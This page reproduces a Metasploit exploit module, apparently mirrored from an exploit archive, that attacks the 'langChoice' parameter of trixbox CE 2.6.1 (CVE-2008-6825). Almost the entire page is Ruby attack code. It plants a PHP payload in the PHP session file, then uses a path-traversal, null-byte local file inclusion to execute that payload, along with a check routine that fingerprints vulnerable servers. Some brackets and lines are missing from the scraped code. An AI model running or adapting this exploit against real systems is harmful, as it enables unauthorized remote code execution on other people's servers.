Fonality trixbox CE 2.6.1 – ‘langChoice’ Local File Inclusion (Metasploit)

  • 作者: Metasploit
    日期: 2011-01-08
  • 类别:
  • 来源:
  • ##
    # $Id: trixbox_langchoice.rb 11516 2011-01-08 01:13:26Z jduck $
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # -*- coding: utf-8 -*-
    require 'msf/core'
    class Metasploit3 < Msf::Exploit::Remote
    	Rank = ManualRanking
    	PHPSESSID_REGEX = /(?:^|;?)PHPSESSID=(\w+)(?:;|$)/
    	include Msf::Exploit::Remote::HttpClient
    	def initialize(info = {})
    			'Name'=> 'Trixbox langChoice PHP Local File Inclusion',
    			'Description' => %q{
    					This module injects php into the trixbox session file and then, in a second call, evaluates
    				that code by manipulating the langChoice parameter as described in OSVDB-50421.
    			'Author'=> ['chao-mu'],
    			'License' => BSD_LICENSE,
    			'Version' => '$Revision: 11516 $',
    					['OSVDB' => '50421'],
    					['CVE' => '2008-6825'],
    					['BID' => '30135'],
    					['URL' => ''],
    					['URL' => '']
    			'Payload' =>
    					# max header length for Apache (8190),
    					# minus 23 for good luck (and extra spacing)
    					'Space' => 8190 - 23,
    					'DisableNops' => true,
    							'ConnectionType' => 'find',
    					'BadChars'=> "'\"`"# quotes are escaped by PHP's magic_quotes_gpc in a default install
    			'Targets'=> [['trixbox CE 2.6.1', {}]],
    			'DefaultTarget'=> 0,
    			'Platform' => 'php',
    			'Arch' => ARCH_PHP,
    			'DisclosureDate' => 'Jul 09 2008'
    			['URI',[true, 'The uri that accepts the langChoice param', '/user/index.php']),'PATH', [true, 'The path where the php was stored', '../../../../../../../../../../tmp/sess_!SESSIONID!%00']),
    			], self.class)
    	def check
    		# We need to ensure that this can be reached via POST
    		uri = datastore['URI']
    		target_code = 200
    		print_status "Attempting to POST to #{uri}"
    		response = send_request_cgi({'uri' => uri, 'method' => 'POST'})
    		unless defined? response
    			print_error 'Server did not respond to HTTP POST request'
    			return Exploit::CheckCode::Safe
    		code = response.code
    		unless code == target_code
    			print_error "Expected HTTP code #{target_code}, but got #{code}."
    			return Exploit::CheckCode::Safe
    		print_status "We received the expected HTTP code #{target_code}"
    		# We will need the cookie PHPSESSID to continue
    		cookies = response.headers['Set-Cookie']
    		# Make sure cookies were set
    		if defined? cookies and cookies =~ PHPSESSID_REGEX
    			print_status "We were successfully sent a PHPSESSID of '#{$1}'"
    			print_error 'The server did not send us the cookie we were looking for'
    			return Exploit::CheckCode::Safe
    		# Okay, at this point we're just being silly and hackish.
    		unless response.body =~ /langChoice/
    			print_error 'The page does not appear to contain a langChoice field'
    			return Exploit::CheckCode::Safe
    		# XXX: Looking for a good way of determine if it is NOT trixbox
    		# unless response.body.match(/trixbox - User Mode/)
    		# 	print_status 'The target does not appear to be running trixbox'
    		# 	return Exploit::CheckCode::Safe
    		# end
    		# print_status 'The target appears to be running trixbox'
    		# If it has the target footer, we know its vulnerable
    		# however skining may mean the reverse is not true
    		# We've only tested on v2.6.1, so that is all we will guarantee
    		# Example footer: v2.6.1 ©2008 Fonality
    #		if response.body =~ /(v2\.(?:[0-5]\.\d|6\.[0-1]))\s{2}&copy;200[0-8] Fonality/
    		if response.body =~ /(v2\.6\.1)\s{2}&copy;2008 Fonality/
    			print_status "Trixbox #{$1} detected!"
    			return Exploit::CheckCode::Vulnerable
    		print_status 'The target may be skinned making detection too difficult'
    		if response.body =~ /trixbox - User Mode/
    			return Exploit::CheckCode::Detected
    			return Exploit::CheckCode::Unknown
    	def exploit
    		# We will be be passing this our langChoice values
    		uri = datastore['URI']
    		# Prepare PHP file contents
    		encoded_php_file = Rex::Text.uri_encode("<?php #{payload.encoded} ?>")
    		# Deliver the payload
    		print_status('Uploading the payload to the remote server')
    		delivery_response = send_request_cgi({
    				'uri'=> uri,
    				'method' => 'POST',
    				'data' => "langChoice=#{encoded_php_file}%00"
    		# The call should return status code 200
    		if delivery_response.code != 200
    			raise RuntimeError, "Server returned unexpected HTTP code #{delivery_response.code}"
    		print_status "The server responded to POST with HTTP code #{delivery_response.code}"
    		# We will need the cookie PHPSESSID to continue
    		cookies = delivery_response.headers['Set-Cookie']
    		# Make sure cookies were set
    		if cookies.nil?
    			raise RuntimeError, 'The server did not set any cookies'
    		# Contents of PHPSESSID. About to be set.
    		session_id = nil
    		# Retrieve the session id from PHPSESSID
    		if cookies =~ PHPSESSID_REGEX
    			session_id = $1
    			raise RuntimeError, 'The cookie PHPSESSID was not set.'
    		print_status "We were assigned a session id (cookie PHPSESSID) of '#{session_id}'"
    		# Prepare the value that will execute our payload
    		detonation = datastore['PATH'].sub('!SESSIONID!', session_id)
    		print_status "We will use '#{detonation}' as the value of langChoice to detonate the payload"
    		# Request the detonation uri, detonating the payload
    		print_status 'Attempting to detonate. You will need to clean /tmp/ yourself.'
    		# Small timeout as we're just going to assume we succeeded.
    				'uri' => uri,
    				'cookie' => cookies,
    				'method' => 'POST',
    				'data' => "langChoice=#{detonation}%00"
    			}, 0.01)